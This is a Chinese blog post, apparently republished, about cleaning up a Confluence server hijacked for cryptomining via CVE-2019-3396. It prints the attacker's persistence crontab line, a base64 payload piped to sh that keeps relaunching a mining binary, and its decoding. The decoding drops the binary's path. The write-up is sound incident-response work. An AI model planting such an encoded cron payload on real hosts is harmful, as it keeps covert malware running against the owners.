最近遇到一台confluence wiki主機被挖礦,收到CPU 告警異常之后,登錄查看,進行分析。
核心處理命令
1、查看confluence用戶的計划任務
crontab -l -u confluence
2、殺死confluence用戶的計划任務
crontab -r -u confluence
top c 命令查看,果然CPU 已經資源已經被吃完了。。
看到用戶是confluence,100%的肯定是confluence的RCE漏洞導致的,因為大部門的使用這個軟件的都是破解版本,官方的補丁都是針對付費用戶的。
具體漏洞細節:
https://github.com/jas502n/CVE-2019-3396
漏洞利用RCE:
處理過程:
1. 先封掉外網HTTP 端口,后續業務走VPN 通道訪問
2. 查殺進程
3. 查殺完成之后,發現進程一直在啟動
想到是否已經寫了計划任務
crontab -l
cat /etc/crontab
都沒有先關信息,最后想到應該沒提權到root
crontab -l -u confluence 查到了相關的惡意計划任務,
通過root cd /var/spool/cron/confluence
:> confluence 清空防止差生新的進程
* * * * * echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1
base64 解密為:
( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &
我的神,死循環怪不得CPU 那么高。。。
cd /opt/atlassian/confluence/temp/
刪除相關惡意二進制文件,然后重啟 confluence 進程,觀察了5分鍾左右,發現未未產生新的惡意進程。
這些文件可能都有異常.文件的時間跟故障時間,基本一致,闡述即可
再次掃描,系統正常。
4. 針對Linux的惡意二進制文件進行在線分析
微步在線可以查殺出來:
奇虎360竟然沒有報毒。。。。。
還是去權威的:https://www.virustotal.com
識別出是惡意的Linux二進制程序
從剛才產生的緩存文件看,應該是集挖礦,DDoS 為一體的一個木馬文件,因為看到了.ntp的隱藏目錄,哈哈,別問我為什么知道
文章來源 https://www.cnblogs.com/hack404/p/11464890.html